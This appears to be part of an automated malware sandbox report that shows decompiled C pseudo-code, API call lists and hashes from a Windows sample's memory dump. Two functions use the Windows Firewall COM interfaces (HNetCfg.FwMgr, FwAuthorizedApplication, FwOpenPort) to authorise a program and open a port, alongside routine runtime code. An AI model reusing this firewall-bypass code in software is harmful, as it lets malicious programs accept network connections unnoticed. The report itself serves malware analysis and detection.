                                                                                                                                                        • Part of subcall function 009930D6: TlsGetValue.KERNEL32(00000004,?,0099314F,00000000,00995F7B,009A0398,00000000,00000314,?,00993A4C,009A0398,Microsoft Visual C++ Runtime Library,00012010), ref: 009930FF
                                                                                                                                                        • Part of subcall function 009930D6: RtlEncodePointer.NTDLL(00000000,?,0099314F,00000000,00995F7B,009A0398,00000000,00000314,?,00993A4C,009A0398,Microsoft Visual C++ Runtime Library,00012010), ref: 0099313D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2585649348-0
                                                                                                                                                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                      • Instruction ID: a8753fc2bb284a10736cc3b65f9ea20d90b8bc86f900cdd26c20d833fa180f02
                                                                                                                                                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00991C57, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00991C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x99f008; // 0x315d8c09
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x9a0128 = _t6;
				 *0x9a0124 = _t22;
				 *0x9a0120 = _t25;
				 *0x9a011c = _t21;
				 *0x9a0118 = _t27;
				 *0x9a0114 = _t26;
				 *0x9a0140 = ss;
				 *0x9a0134 = cs;
				 *0x9a0110 = ds;
				 *0x9a010c = es;
				 *0x9a0108 = fs;
				 *0x9a0104 = gs;
				asm("pushfd");
				_pop( *0x9a0138);
				 *0x9a012c =  *_t31;
				 *0x9a0130 = _v0;
				 *0x9a013c =  &_a4;
				 *0x9a0078 = 0x10001;
				_t11 =  *0x9a0130; // 0x0
				 *0x9a002c = _t11;
				 *0x9a0020 = 0xc0000409;
				 *0x9a0024 = 1;
				_t12 =  *0x99f008; // 0x315d8c09
				_v812 = _t12;
				_t13 =  *0x99f00c; // 0xcea273f6
				_v808 = _t13;
				 *0x9a0070 = IsDebuggerPresent();
				_push(1);
				E00994E10(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x99c1b4);
				if( *0x9a0070 == 0) {
					_push(1);
					E00994E10(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                      0x00991c57
                                                                                                                                                      0x00991c57
                                                                                                                                                      0x00991c57
                                                                                                                                                      0x00991c57
                                                                                                                                                      0x00991c57
                                                                                                                                                      0x00991c57
                                                                                                                                                      0x00991c57
                                                                                                                                                      0x00991c5d
                                                                                                                                                      0x00991c5f
                                                                                                                                                      0x00991c5f
                                                                                                                                                      0x009924f7
                                                                                                                                                      0x009924fc
                                                                                                                                                      0x00992502
                                                                                                                                                      0x00992508
                                                                                                                                                      0x0099250e
                                                                                                                                                      0x00992514
                                                                                                                                                      0x0099251a
                                                                                                                                                      0x00992521
                                                                                                                                                      0x00992528
                                                                                                                                                      0x0099252f
                                                                                                                                                      0x00992536
                                                                                                                                                      0x0099253d
                                                                                                                                                      0x00992544
                                                                                                                                                      0x00992545
                                                                                                                                                      0x0099254e
                                                                                                                                                      0x00992556
                                                                                                                                                      0x0099255e
                                                                                                                                                      0x00992569
                                                                                                                                                      0x00992573
                                                                                                                                                      0x00992578
                                                                                                                                                      0x0099257d
                                                                                                                                                      0x00992587
                                                                                                                                                      0x00992591
                                                                                                                                                      0x00992596
                                                                                                                                                      0x0099259c
                                                                                                                                                      0x009925a1
                                                                                                                                                      0x009925ad
                                                                                                                                                      0x009925b2
                                                                                                                                                      0x009925b4
                                                                                                                                                      0x009925bc
                                                                                                                                                      0x009925c7
                                                                                                                                                      0x009925d4
                                                                                                                                                      0x009925d6
                                                                                                                                                      0x009925d8
                                                                                                                                                      0x009925dd
                                                                                                                                                      0x009925f1

                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 009925A7
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009925BC
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0099C1B4), ref: 009925C7
                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 009925E3
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 009925EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                      • Opcode ID: ca57e35424b676f66cb0ce8b7258cca22fae52968fa49e7e018dec481c94f68b
                                                                                                                                                      • Instruction ID: c51ceb55ad0afa16cbc4ec32676d555c86fd9d442fdd27b29d35a438264611d3
                                                                                                                                                      • Opcode Fuzzy Hash: ca57e35424b676f66cb0ce8b7258cca22fae52968fa49e7e018dec481c94f68b
                                                                                                                                                      • Instruction Fuzzy Hash: 4121DDB492D204DFDB81DF68FC866847BA4FF8E314F00412AE54887261E7B05985EF99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009917BE, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 164comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 61%
                                                                                                                                                      			E009917BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t80;
				void* _t83;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				signed int _t120;

				_t115 = __edx;
				_t54 =  *0x99f008; // 0x315d8c09
				_v8 = _t54 ^ _t120;
				_v52 = _a4;
				_v48 = _a8;
				__imp__CoInitialize(0);
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v28 = 0;
				_t59 = E009980F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t59,  &_v24);
				_t117 = _t59;
				if(_t59 >= 0) {
					_t100 = __imp__CoCreateInstance;
					_t74 =  *_t100( &_v24, 0, 5, 0x99c17c,  &_v36);
					_t117 = _t74;
					if(_t74 >= 0) {
						_t75 = _v36;
						_t115 =  &_v32;
						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
						_t117 = _t76;
						if(_t76 >= 0) {
							_t77 = _v32;
							_t115 =  &_v40;
							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
							_t117 = _t78;
							if(_t78 >= 0) {
								_t80 = E009980F0( &_v40, "HNetCfg.FwAuthorizedApplication");
								__imp__CLSIDFromProgID(_t80,  &_v24);
								_t117 = _t80;
								if(_t80 >= 0) {
									_t83 =  *_t100( &_v24, 0, 5, 0x99c17c,  &_v28);
									_t117 = _t83;
									if(_t83 >= 0) {
										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E009980F0( &_v40, _v48));
										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E009980F0(_t115, _v52));
										_t90 = _v28;
										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
										_t92 = _v28;
										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
										_t94 = _v28;
										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
										_t96 = _v40;
										_t115 =  &_v44;
										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
										_t117 = _t97;
										if(_t97 >= 0) {
											_t98 = _v44;
											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
										}
									}
								}
							}
						}
					}
				}
				_t60 = _v28;
				if(_t60 != 0) {
					 *((intOrPtr*)( *_t60 + 8))(_t60);
				}
				_t61 = _v44;
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				_t62 = _v40;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 8))(_t62);
				}
				_t63 = _v32;
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 8))(_t63);
				}
				_t64 = _v36;
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 8))(_t64);
				}
				__imp__CoUninitialize();
				return E00991C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
			}





































                                                                                                                                                      0x009917be
                                                                                                                                                      0x009917c4
                                                                                                                                                      0x009917cb
                                                                                                                                                      0x009917d4
                                                                                                                                                      0x009917dd
                                                                                                                                                      0x009917e0
                                                                                                                                                      0x009917ef
                                                                                                                                                      0x009917f2
                                                                                                                                                      0x009917f5
                                                                                                                                                      0x009917f8
                                                                                                                                                      0x009917fb
                                                                                                                                                      0x009917fe
                                                                                                                                                      0x00991804
                                                                                                                                                      0x0099180a
                                                                                                                                                      0x0099180e
                                                                                                                                                      0x00991814
                                                                                                                                                      0x0099182a
                                                                                                                                                      0x0099182c
                                                                                                                                                      0x00991830
                                                                                                                                                      0x00991836
                                                                                                                                                      0x0099183b
                                                                                                                                                      0x00991840
                                                                                                                                                      0x00991843
                                                                                                                                                      0x00991847
                                                                                                                                                      0x0099184d
                                                                                                                                                      0x00991852
                                                                                                                                                      0x00991857
                                                                                                                                                      0x0099185a
                                                                                                                                                      0x0099185e
                                                                                                                                                      0x0099186d
                                                                                                                                                      0x00991873
                                                                                                                                                      0x00991879
                                                                                                                                                      0x0099187d
                                                                                                                                                      0x00991893
                                                                                                                                                      0x00991895
                                                                                                                                                      0x00991899
                                                                                                                                                      0x009918ac
                                                                                                                                                      0x009918c0
                                                                                                                                                      0x009918c3
                                                                                                                                                      0x009918ca
                                                                                                                                                      0x009918cd
                                                                                                                                                      0x009918d5
                                                                                                                                                      0x009918d8
                                                                                                                                                      0x009918e0
                                                                                                                                                      0x009918e3
                                                                                                                                                      0x009918e8
                                                                                                                                                      0x009918ed
                                                                                                                                                      0x009918f0
                                                                                                                                                      0x009918f4
                                                                                                                                                      0x009918f6
                                                                                                                                                      0x00991902
                                                                                                                                                      0x00991902
                                                                                                                                                      0x009918f4
                                                                                                                                                      0x00991899
                                                                                                                                                      0x0099187d
                                                                                                                                                      0x0099185e
                                                                                                                                                      0x00991847
                                                                                                                                                      0x00991830
                                                                                                                                                      0x00991904
                                                                                                                                                      0x00991909
                                                                                                                                                      0x0099190e
                                                                                                                                                      0x0099190e
                                                                                                                                                      0x00991911
                                                                                                                                                      0x00991916
                                                                                                                                                      0x0099191b
                                                                                                                                                      0x0099191b
                                                                                                                                                      0x0099191e
                                                                                                                                                      0x00991923
                                                                                                                                                      0x00991928
                                                                                                                                                      0x00991928
                                                                                                                                                      0x0099192b
                                                                                                                                                      0x00991930
                                                                                                                                                      0x00991935
                                                                                                                                                      0x00991935
                                                                                                                                                      0x00991938
                                                                                                                                                      0x0099193d
                                                                                                                                                      0x00991942
                                                                                                                                                      0x00991942
                                                                                                                                                      0x00991945
                                                                                                                                                      0x0099195b

                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 009917E0
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009917FE
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00991804
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 0099182A
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099186D
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00991873
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 00991893
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009918A3
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009918B7
                                                                                                                                                      • CoUninitialize.OLE32 ref: 00991945
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                      • API String ID: 4233194485-1951265404
                                                                                                                                                      • Opcode ID: edb4b16765109d45329c400dd9e179451c27bd537e36c28f3c0ddf5ed8d022d3
                                                                                                                                                      • Instruction ID: 41b16cbddfd3066c25a2acc0d6980eeb169a99878ed945eb03352ae7f0c1c90b
                                                                                                                                                      • Opcode Fuzzy Hash: edb4b16765109d45329c400dd9e179451c27bd537e36c28f3c0ddf5ed8d022d3
                                                                                                                                                      • Instruction Fuzzy Hash: 53512AB1A002199FCF10EBA8C889DEEFBB9FF89710B144555F906E7260DB31AC41CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0099195C, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 178comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                      			E0099195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t85;
				void* _t87;
				void* _t90;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				void* _t107;
				intOrPtr* _t108;
				char _t130;
				signed int _t133;

				_t128 = __edx;
				_t61 =  *0x99f008; // 0x315d8c09
				_v8 = _t61 ^ _t133;
				_v56 = _a4;
				_t130 = 0;
				_v60 = _a8;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v28 = 0;
				_t66 = E009980F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t66,  &_v24);
				_t110 = _t66;
				if(_t66 >= 0) {
					_t129 = __imp__CoCreateInstance;
					_t81 =  *_t129( &_v24, 0, 5, 0x99c17c,  &_v32);
					_t110 = _t81;
					if(_t81 >= 0) {
						_t82 = _v32;
						_t128 =  &_v44;
						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
						_t110 = _t83;
						if(_t83 >= 0) {
							_t84 = _v44;
							_t128 =  &_v40;
							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
							_t110 = _t85;
							if(_t85 >= 0) {
								_t87 = E009980F0( &_v40, "HNetCfg.FwOpenPort");
								__imp__CLSIDFromProgID(_t87,  &_v24);
								_t110 = _t87;
								if(_t87 >= 0) {
									_t90 =  *_t129( &_v24, 0, 5, 0x99c17c,  &_v28);
									_t110 = _t90;
									if(_t90 >= 0) {
										_t129 = _v60;
										_v52 = 0;
										_v48 = 0x100;
										if(E00991071(_v60,  &_v48,  &_v52) != 0) {
											_t93 = _v28;
											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
											_t95 = _v28;
											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E009980F0( &_v40, _v56));
											_t100 = _v28;
											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
											_t102 = _v28;
											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
											_t104 = _v28;
											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
											_t106 = _v40;
											_t128 =  &_v36;
											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
											_t110 = _t107;
											if(_t107 >= 0) {
												_t108 = _v36;
												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
											}
										}
										_t130 = 0;
									}
								}
							}
						}
					}
				}
				_t67 = _v28;
				if(_t67 != _t130) {
					 *((intOrPtr*)( *_t67 + 8))(_t67);
				}
				_t68 = _v36;
				if(_t68 != _t130) {
					 *((intOrPtr*)( *_t68 + 8))(_t68);
				}
				_t69 = _v40;
				if(_t69 != _t130) {
					 *((intOrPtr*)( *_t69 + 8))(_t69);
				}
				_t70 = _v44;
				if(_t70 != _t130) {
					 *((intOrPtr*)( *_t70 + 8))(_t70);
				}
				_t71 = _v32;
				if(_t71 != _t130) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				__imp__CoUninitialize();
				return E00991C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
			}









































                                                                                                                                                      0x0099195c
                                                                                                                                                      0x00991962
                                                                                                                                                      0x00991969
                                                                                                                                                      0x00991972
                                                                                                                                                      0x00991978
                                                                                                                                                      0x0099197b
                                                                                                                                                      0x0099197e
                                                                                                                                                      0x0099198d
                                                                                                                                                      0x00991990
                                                                                                                                                      0x00991993
                                                                                                                                                      0x00991996
                                                                                                                                                      0x00991999
                                                                                                                                                      0x0099199c
                                                                                                                                                      0x009919a2
                                                                                                                                                      0x009919a8
                                                                                                                                                      0x009919ac
                                                                                                                                                      0x009919b2
                                                                                                                                                      0x009919c8
                                                                                                                                                      0x009919ca
                                                                                                                                                      0x009919ce
                                                                                                                                                      0x009919d4
                                                                                                                                                      0x009919d9
                                                                                                                                                      0x009919de
                                                                                                                                                      0x009919e1
                                                                                                                                                      0x009919e5
                                                                                                                                                      0x009919eb
                                                                                                                                                      0x009919f0
                                                                                                                                                      0x009919f5
                                                                                                                                                      0x009919f8
                                                                                                                                                      0x009919fc
                                                                                                                                                      0x00991a0b
                                                                                                                                                      0x00991a11
                                                                                                                                                      0x00991a17
                                                                                                                                                      0x00991a1b
                                                                                                                                                      0x00991a31
                                                                                                                                                      0x00991a33
                                                                                                                                                      0x00991a37
                                                                                                                                                      0x00991a3d
                                                                                                                                                      0x00991a43
                                                                                                                                                      0x00991a4a
                                                                                                                                                      0x00991a59
                                                                                                                                                      0x00991a5b
                                                                                                                                                      0x00991a64
                                                                                                                                                      0x00991a67
                                                                                                                                                      0x00991a70
                                                                                                                                                      0x00991a84
                                                                                                                                                      0x00991a87
                                                                                                                                                      0x00991a8f
                                                                                                                                                      0x00991a92
                                                                                                                                                      0x00991a9a
                                                                                                                                                      0x00991a9d
                                                                                                                                                      0x00991aa5
                                                                                                                                                      0x00991aa8
                                                                                                                                                      0x00991aad
                                                                                                                                                      0x00991ab2
                                                                                                                                                      0x00991ab5
                                                                                                                                                      0x00991ab9
                                                                                                                                                      0x00991abb
                                                                                                                                                      0x00991ac7
                                                                                                                                                      0x00991ac7
                                                                                                                                                      0x00991ab9
                                                                                                                                                      0x00991ac9
                                                                                                                                                      0x00991ac9
                                                                                                                                                      0x00991a37
                                                                                                                                                      0x00991a1b
                                                                                                                                                      0x009919fc
                                                                                                                                                      0x009919e5
                                                                                                                                                      0x009919ce
                                                                                                                                                      0x00991acb
                                                                                                                                                      0x00991ad0
                                                                                                                                                      0x00991ad5
                                                                                                                                                      0x00991ad5
                                                                                                                                                      0x00991ad8
                                                                                                                                                      0x00991add
                                                                                                                                                      0x00991ae2
                                                                                                                                                      0x00991ae2
                                                                                                                                                      0x00991ae5
                                                                                                                                                      0x00991aea
                                                                                                                                                      0x00991aef
                                                                                                                                                      0x00991aef
                                                                                                                                                      0x00991af2
                                                                                                                                                      0x00991af7
                                                                                                                                                      0x00991afc
                                                                                                                                                      0x00991afc
                                                                                                                                                      0x00991aff
                                                                                                                                                      0x00991b04
                                                                                                                                                      0x00991b09
                                                                                                                                                      0x00991b09
                                                                                                                                                      0x00991b0c
                                                                                                                                                      0x00991b22

                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0099197E
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099199C
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009919A2
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 009919C8
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991A0B
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00991A11
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 00991A31
                                                                                                                                                        • Part of subcall function 00991071: __wcstoui64.LIBCMT ref: 009910DB
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991A7B
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • CoUninitialize.OLE32 ref: 00991B0C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                      • String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
                                                                                                                                                      • API String ID: 3570467124-3777566516
                                                                                                                                                      • Opcode ID: 4688d1105fd1533d5cccf64d8e3b27f5163152592235d18701577ebd3270f8f3
                                                                                                                                                      • Instruction ID: a08d980d3ae0ac7c6faf1269a9b7c36eeb54d9d0cb31e80574e765a80f27e4e6
                                                                                                                                                      • Opcode Fuzzy Hash: 4688d1105fd1533d5cccf64d8e3b27f5163152592235d18701577ebd3270f8f3
                                                                                                                                                      • Instruction Fuzzy Hash: FD51D6B5A01219AFCF00DBE8C8899AEBBB9FF8D710B144455F502EB251DB75AD41CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0099323D, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E0099323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x99dd18);
				E00993F70(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00992003(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x99c870;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x99f010;
				E00993C3D(_t35, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00993312();
				E00993C3D(_t35, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x99f618; // 0x99f540
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E00992EFA( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E00993FB5(E0099331B());
			}








                                                                                                                                                      0x0099323d
                                                                                                                                                      0x0099323d
                                                                                                                                                      0x0099323f
                                                                                                                                                      0x00993244
                                                                                                                                                      0x00993249
